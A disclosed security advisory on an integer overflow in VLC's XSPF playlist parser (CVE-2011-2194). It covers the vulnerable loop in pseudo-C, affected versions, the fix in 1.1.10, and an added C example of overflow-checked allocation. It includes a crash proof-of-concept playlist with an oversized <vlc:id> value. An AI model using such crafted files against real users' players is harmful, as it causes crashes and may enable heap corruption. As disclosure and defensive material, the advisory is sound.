VLC XSPF Local File Integer Overflow Vulnerability (SS-2011-006)

  • Title: VLC XSPF Local File Integer Overflow Vulnerability
  • Version: 1.0
  • Issue type: Integer overflow
  • Affected vendor: VideoLAN
  • Release date: 22 July 2011
  • Discovered by: Rocco Calvi
  • Issue status: Patch available

Summary

VideoLAN’s VLC media player version 1.1.9 down to 0.8.5 suffers from an integer overflow resulting in a heap-based buffer overflow through the XSPF playlist file parser when opening crafted malicious playlist (.XSPF) files.


Description

The XSPF parser in VLC’s “Demuxers: Playlist” component reads a decimal value from the <vlc:id> tag of a playlist entry. When a sufficiently large value is supplied, the program writes beyond the memory segment allocated for its data and crashes. For example, setting the <vlc:id> value to 1073741823 (<vlc:id>1073741823</vlc:id>) results in a MEMORY ACCESS VIOLATION and the application crashes.

[Screenshot: VLC Media Player attempting to access a memory address outside the segment]

As the screenshot above demonstrates, we supply a large decimal integer value (1073741823) for the vlc:id in our specially crafted .xspf file. When the application handles the xspf file, this value is loaded into the EDX register as 3FFFFFFF. As the loop counter increases and approaches the supplied value held in EDX, the loop attempts to access an invalid memory address past the end of the memory segment, and the application crashes.

Below is a demonstration of the vulnerable code in pseudo-C (the loop zeroes eight dwords per iteration until the counter reaches the attacker-controlled value held in EDX):

    do
    {
        __counter += 8;
        mem->dword0 = 0;
        mem->dword4 = 0;
        mem->dword8 = 0;
        mem->dwordC = 0;
        mem->dword10 = 0;
        mem->dword14 = 0;
        mem->dword18 = 0;
        mem->dword1C = 0;
        ++mem; /* access violation once mem points past the end of the memory segment */
    }
    while ( __counter <= __controlled_value_edx );


Impact

If an attacker is able to under-allocate a controlled heap buffer via the integer overflow, then the vulnerability is likely to lead to arbitrary code execution in the context of the application.
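The following is an added example, not VLC’s code or the fix VideoLAN shipped. It models in C how a 32-bit (id + 1) * sizeof(pointer) allocation size wraps to zero for the PoC value discussed above, which is the under-allocation this section refers to, and shows a bounded, overflow-checked replacement together with strict parsing of the <vlc:id> text. MAX_TRACKS, the function names and the 4-byte pointer model are assumptions.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define PTR_SIZE   4u       /* pointer size of a 32-bit build, matching the EDX analysis above */
#define MAX_TRACKS 65536u   /* hypothetical upper bound on <vlc:id>; not a VLC constant */

/* Unchecked model of "(id + 1) * sizeof(pointer)" in 32-bit arithmetic.
 * For the PoC value 0x3FFFFFFF the product is 0x100000000, which wraps to 0,
 * so the allocator is asked for zero bytes and the zeroing loop runs off the end. */
static uint32_t unchecked_alloc_size(uint32_t track_id)
{
    return (track_id + 1u) * PTR_SIZE;
}

/* Checked version: returns the byte count, or 0 when the id is rejected
 * (outside the application bound, or the multiplication would wrap). */
static uint32_t checked_alloc_size(uint32_t track_id)
{
    if (track_id >= MAX_TRACKS)
        return 0;                          /* bound the id before doing arithmetic on it */
    uint32_t count = track_id + 1u;        /* cannot wrap: track_id < MAX_TRACKS */
    if (count > UINT32_MAX / PTR_SIZE)
        return 0;                          /* defensive: product would not fit in 32 bits */
    return count * PTR_SIZE;
}

/* Parses the decimal text of a <vlc:id> element. Returns the id, or -1 if the
 * text has a sign, leading whitespace, trailing junk, or exceeds 32 bits. */
static int64_t parse_vlc_id(const char *text)
{
    char *end;
    if (text == NULL || *text < '0' || *text > '9')
        return -1;                         /* strtoul alone would accept "-1" or " 5" */
    errno = 0;
    unsigned long v = strtoul(text, &end, 10);
    if (*end != '\0' || errno == ERANGE || v > UINT32_MAX)
        return -1;
    return (int64_t)v;
}

int main(void)
{
    int64_t id = parse_vlc_id("1073741823");   /* the value from the proof of concept */
    printf("id %lld: unchecked size = %u bytes, checked size = %u (0 = rejected)\n",
           (long long)id, unchecked_alloc_size((uint32_t)id),
           checked_alloc_size((uint32_t)id));
    return 0;
}
```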


Affected products

VideoLAN VLC media player 1.1.9
VideoLAN VLC media player 1.1.8
VideoLAN VLC media player 1.1.7
VideoLAN VLC media player 1.1.6
VideoLAN VLC media player 1.1.5
VideoLAN VLC media player 1.1.4
VideoLAN VLC media player 1.1.3
VideoLAN VLC media player 1.1.2
VideoLAN VLC media player 1.1.1
VideoLAN VLC media player 1.1.0
VideoLAN VLC media player 1.1
VideoLAN VLC media player 1.0.6
VideoLAN VLC media player 1.0.5
VideoLAN VLC media player 1.0.4
VideoLAN VLC media player 1.0.3
VideoLAN VLC media player 1.0.2
VideoLAN VLC media player 1.0.1
VideoLAN VLC media player 1.0
VideoLAN VLC media player 0.9.9
VideoLAN VLC media player 0.9.8a
VideoLAN VLC media player 0.9.7
VideoLAN VLC media player 0.9.6
VideoLAN VLC media player 0.9.5
VideoLAN VLC media player 0.9.4
VideoLAN VLC media player 0.9.3
VideoLAN VLC media player 0.9.2
VideoLAN VLC media player 0.9.1
VideoLAN VLC media player 0.9
VideoLAN VLC media player 0.8.6i
VideoLAN VLC media player 0.8.6h
VideoLAN VLC media player 0.8.6g
VideoLAN VLC media player 0.8.6f
VideoLAN VLC media player 0.8.6e
VideoLAN VLC media player 0.8.6d
VideoLAN VLC media player 0.8.6c
VideoLAN VLC media player 0.8.6b
VideoLAN VLC media player 0.8.6a
VideoLAN VLC media player 0.8.6
+ Debian Linux 4.0 sparc
+ Debian Linux 4.0 s/390
+ Debian Linux 4.0 powerpc
+ Debian Linux 4.0 mipsel
+ Debian Linux 4.0 mips
+ Debian Linux 4.0 m68k
+ Debian Linux 4.0 ia-64
+ Debian Linux 4.0 ia-32
+ Debian Linux 4.0 hppa
+ Debian Linux 4.0 arm
+ Debian Linux 4.0 amd64
+ Debian Linux 4.0 alpha
+ Debian Linux 4.0


Proof of concept

<playlist version="1">
  <title>Playlist</title>
  <trackList>
    <track>
      <location>file:///file.mp3</location>
      <duration>992</duration>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>1073741823</vlc:id>
      </extension>
    </track>
  </trackList>
  <extension application="http://www.videolan.org/vlc/playlist/0">
    <vlc:item tid="0"/>
  </extension>
</playlist>


Solution

VideoLAN have released VLC Media Player 1.1.10 which addresses this issue.


Response timeline

  • 03/06/2011 - Vendor notified.
  • 05/06/2011 - Vendor confirms issue presence.
  • 05/06/2011 - Stratsec confirms patch resolves issue.
  • 22/07/2011 - This advisory published.

References

  • Vendor advisory: http://www.videolan.org/security/sa1104.html
  • CVE item: CVE-2011-2194
  • VLC ID: VideoLAN-SA-110